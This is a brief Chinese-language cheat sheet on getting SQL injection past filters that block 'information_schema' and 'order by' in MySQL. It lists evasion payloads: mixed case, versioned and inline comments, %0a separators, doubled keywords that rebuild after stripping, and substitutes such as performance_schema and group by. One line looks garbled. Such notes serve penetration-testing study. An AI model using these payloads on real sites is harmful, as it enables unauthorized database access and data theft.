绕过【information_schema】，【order by】过滤

1.大小写混合

利用数据库不区分大小写

inFOrmation_schema

inFoRMAtion_ScheMA

Order by

ORDer By

2./*!information_schema*/数据库的特性

/**/注释可以代替空格

/*!*/在这里会被mysql所识别

/*!50000information_schema*/

/*!order by*/

order/*666*/ by

order%0aby

order()bay

SELECT * FROM users ORDER `BY` `id` -- 

3.当过滤一个information_schema时

可以informationinformation_schema_schema

当information_schema被过滤这个就会被重新组成information_schema

ororder byder by

最后组成order by

4.同等替代

使用 performance_schema

performance_schema 是另一个系统数据库，主要用于性能监控。它提供了详细的性能指标和诊断信息，但也可以用来获取一些与 information_schema 类似的元数据。

虽然 performance_schema 主要用于性能监控，但它也可以提供一些关于数据库连接、锁、事件等的详细信息

order by可以用group by +聚合函数

select * from user group by id -- MySQL可能按id排序

union 的子查询排序

union select 1,2,3 from user order by 1

当order by 注入到union后的子查询中

数学表达式排序

select * from user order by id+0

转换为数字运算逃过关键字检测